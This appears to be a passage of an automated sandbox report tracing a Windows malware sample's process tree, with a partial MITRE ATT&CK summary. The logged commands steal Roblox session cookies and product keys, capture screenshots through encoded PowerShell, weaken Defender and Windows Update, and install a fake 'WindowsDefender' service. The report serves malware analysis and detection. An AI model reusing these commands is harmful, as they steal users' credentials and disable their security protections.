        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        10⤵
        
        PID:1256
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        11⤵
        
        PID:2064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        10⤵
        
        PID:4712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        11⤵
        
        PID:4844
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yof2zwuv\yof2zwuv.cmdline"
        12⤵
        
        PID:5080
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA335.tmp" "c:\Users\Admin\AppData\Local\Temp\yof2zwuv\CSC6F2E184C7C894667AB89E0DE1B3A92EB.TMP"
        13⤵
        
        PID:3832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:248
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:5076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        10⤵
        
        PID:4100
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        11⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:4104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:3364
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:4632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        10⤵
        
        PID:4040
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        11⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:4956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:3112
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:1284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:1576
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:3508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:2424
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        
        PID:4584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:3468
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:2892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        10⤵
        
        PID:5104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        10⤵
        
        PID:244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        
        PID:4888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49042\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\Ni9gh.zip" *"
        10⤵
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\_MEI49042\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI49042\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\Ni9gh.zip" *
        11⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        10⤵
        
        PID:744
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        11⤵
        
        PID:4396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        10⤵
        
        PID:4312
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        11⤵
        
        PID:5016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        10⤵
        
        PID:5060
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        11⤵
        
        PID:2204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        10⤵
        
        PID:2920
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        10⤵
        
        PID:2120
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:5084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        10⤵
        
        PID:2572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:2352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        11⤵
        
        PID:2648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\upinstall.exe
        7⤵
        
        PID:4544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\updater.exe
        7⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\updater.exe
        
        C:\Users\Admin\AppData\updater.exe
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        
        PID:1532
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        9⤵
        
        PID:1636
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        10⤵
        
        PID:5016
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        9⤵
        Launches sc.exe
        
        PID:772
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        9⤵
        Launches sc.exe
        
        PID:4552
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        9⤵
        Launches sc.exe
        
        PID:2780
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        9⤵
        Launches sc.exe
        
        PID:4148
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        9⤵
        Launches sc.exe
        
        PID:2476
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        9⤵
        Power Settings
        
        PID:3152
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:2792
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        9⤵
        Power Settings
        
        PID:4792
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        9⤵
        Power Settings
        
        PID:4284
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        9⤵
        Power Settings
        
        PID:720
        
        C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        9⤵
        
        PID:3416
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WindowsDefender"
        9⤵
        Launches sc.exe
        
        PID:1684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:1512
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WindowsDefender" binpath= "C:\ProgramData\WindowsDefender\windows32.exe" start= "auto"
        9⤵
        Launches sc.exe
        
        PID:2496
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        9⤵
        Launches sc.exe
        
        PID:3584
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WindowsDefender"
        9⤵
        Launches sc.exe
        
        PID:2648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\updater.exe
        7⤵
        
        PID:336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3524

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3876

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3944

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4032

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3828

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1260

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2836

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2200

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:3872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4200

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:924

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1384

C:\ProgramData\WindowsDefender\windows32.exe
C:\ProgramData\WindowsDefender\windows32.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:4560
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3704
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3088
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:544
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4380
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4844
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:4504
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:396
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4224
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2264
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3888
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4816
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4928
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:3852
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:5096
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:1776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

